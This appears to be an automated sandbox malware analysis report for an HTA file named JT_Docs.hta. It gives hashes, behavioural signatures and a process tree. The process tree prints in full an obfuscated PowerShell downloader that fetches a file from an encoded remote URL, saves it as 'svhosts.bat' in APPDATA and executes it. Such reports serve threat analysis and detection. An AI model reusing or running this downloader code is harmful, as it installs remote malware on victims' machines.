Analysis
-
max time kernel
112s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
05-01-2023 14:22
Static task
static1
Behavioral task
behavioral1
Sample
JT_Docs.hta
Resource
win7-20221111-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
JT_Docs.hta
Resource
win10v2004-20221111-en
windows10-2004-x64
6 signatures
150 seconds
General
-
Target
JT_Docs.hta
-
Size
150KB
-
MD5
35a9a6433a12fe8fb4ebfa0a16f76f4a
-
SHA1
63ed3556dbed1ce1446c906b926a621c378bbb62
-
SHA256
265f353a79c0781e17204623553f5ec3d358315f22b1d85bafc247e89774509e
-
SHA512
19a9b0c57f800eac64de911b239bdb94dc03d970589a0e90de5640beb84c80dcd907d7bc8bf973f4024ade15fbf7c7475be7ec1ad98dfab72d179694a67dbe93
-
SSDEEP
1536:EoNuWWs3uWWwhiXHWX9ivXV5W7X3q7y99ZZrrZb7/+9XSXEsbXuiusEdu3SiOb5s:Eo
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 3688 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3688 powershell.exe 3688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3688 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1080 wrote to memory of 3688 1080 mshta.exe 82 PID 1080 wrote to memory of 3688 1080 mshta.exe 82 PID 1080 wrote to memory of 3688 1080 mshta.exe 82
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\JT_Docs.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function vTfah($xQudNzEj, $OFweEKg){[IO.File]::WriteAllBytes($xQudNzEj, $OFweEKg)};function IEtfY($xQudNzEj){if($xQudNzEj.EndsWith((yGQSet @(15626,15680,15688,15688))) -eq $True){Start-Process (yGQSet @(15694,15697,15690,15680,15688,15688,15631,15630,15626,15681,15700,15681)) $xQudNzEj}else{Start-Process $xQudNzEj}};function bZmJux($pVbtIjHBE){$QTuDPuAwz = New-Object (yGQSet @(15658,15681,15696,15626,15667,15681,15678,15647,15688,15685,15681,15690,15696));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OFweEKg = $QTuDPuAwz.DownloadData($pVbtIjHBE);return $OFweEKg};function yGQSet($mSphbW){$TdkvfmoLP=15580;$lmVbKAnzp=$Null;foreach($GsSYfGNP in $mSphbW){$lmVbKAnzp+=[char]($GsSYfGNP-$TdkvfmoLP)};return $lmVbKAnzp};function nRSqmFi(){$CZtjuCtmV = $env:APPDATA + '\';$ryrbnkPg = bZmJux (yGQSet @(15684,15696,15696,15692,15638,15627,15627,15692,15694,15685,15698,15677,15696,15681,15695,15681,15679,15697,15694,15681,15680,15626,15680,15697,15679,15687,15680,15690,15695,15626,15691,15694,15683,15627,15679,15685,15701,15698,15627,15695,15698,15684,15691,15695,15696,15695,15626,15678,15677,15696));$IGRwg = $CZtjuCtmV + 'svhosts.bat';vTfah $IGRwg $ryrbnkPg;IEtfY $IGRwg;;;;}nRSqmFi;2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3688
-